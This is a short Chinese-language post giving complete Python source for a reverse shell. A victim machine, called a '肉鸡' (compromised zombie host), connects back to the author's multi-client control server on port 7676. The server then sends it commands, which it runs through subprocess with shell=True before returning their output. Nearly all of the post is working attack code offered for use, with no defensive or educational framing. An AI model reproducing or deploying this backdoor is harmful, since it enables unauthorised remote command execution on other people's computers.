反弹 shell，以肉鸡为客户端，本机为服务端。
调用 subprocess 模块的 Popen 函数，此函数会新建一个子进程，用于 shell 会话。
python 3.5
server端代码
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import socket import threading clientList = [] #连接的客户端列表 curClient = None #当前的客户端 quitThread = False #是否退出线程 lock = threading.Lock() def shell_ctrl(socket,addr): while True: com = input(str(addr[0]) + ':~#') if com == '!ch': select_client() return if com == '!q': quitThread = True print('-----------------------* Connection has ended *--------------------------') exit(0) socket.send(com.encode('utf-8')) data = socket.recv(1024) print(data.decode('utf-8')) def select_client(): global clientList global curClient print('--------------* The current is connected to the client: *----------------') for i in range(len(clientList)): print('[%i]-> %s' % (i, str(clientList[i][1][0]))) print('Please select a client!') while True: num = input('client num:') if int(num) >= len(clientList): print('Please input a correct num!') continue else: break curClient = clientList[int(num)] print('=' * 80) print(' ' * 20 + 'Client Shell from addr:', curClient[1][0]) print('=' * 80) def wait_connect(sk): global clientList while not quitThread: if len(clientList) == 0: print('Waiting for the connection......') sock, addr = sk.accept() print('New client %s is connection!' % (addr[0])) lock.acquire() clientList.append((sock, addr)) lock.release() def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0',7676)) s.listen(1024) t = threading.Thread(target=wait_connect,args=(s,)) t.start() while True: if len(clientList) > 0: select_client() # 选择一个客户端 shell_ctrl(curClient[0],curClient[1]) #处理shell命令 if __name__ == '__main__': main()
客户端代码
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import socket import subprocess import argparse import sys import time import threading def connectHost(ht,pt): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ht,int(pt))) while True: data = sock.recv(1024) data = data.decode('utf-8') comRst = subprocess.Popen(data,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) m_stdout, m_stderr = comRst.communicate() sock.send(m_stdout.decode(sys.getfilesystemencoding()).encode('utf-8')) time.sleep(1) sock.close() def main(): parser = argparse.ArgumentParser() #命令行参数解析对象 parser.add_argument('-H',dest='hostName',help='Host Name') parser.add_argument('-p',dest='conPort',help='Host Port') args = parser.parse_args() #解析命令行参数 host = args.hostName port = args.conPort if host == None and port == None: print(parser.parse_args(['-h'])) exit(0) connectHost(host,port) #连接到控制端 if __name__ == '__main__': main()